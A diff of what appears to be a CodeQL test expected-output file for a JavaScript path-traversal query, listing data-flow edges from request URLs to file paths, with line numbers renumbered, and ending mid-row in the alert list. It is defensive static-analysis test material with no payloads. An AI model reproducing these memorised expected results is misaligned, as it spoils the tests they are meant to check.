TaintedPath.js:132:19:132:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:136:19:136:23 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... '), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | @@ -899,10 +899,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -944,69 +944,69 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... , true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | subpaths #select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 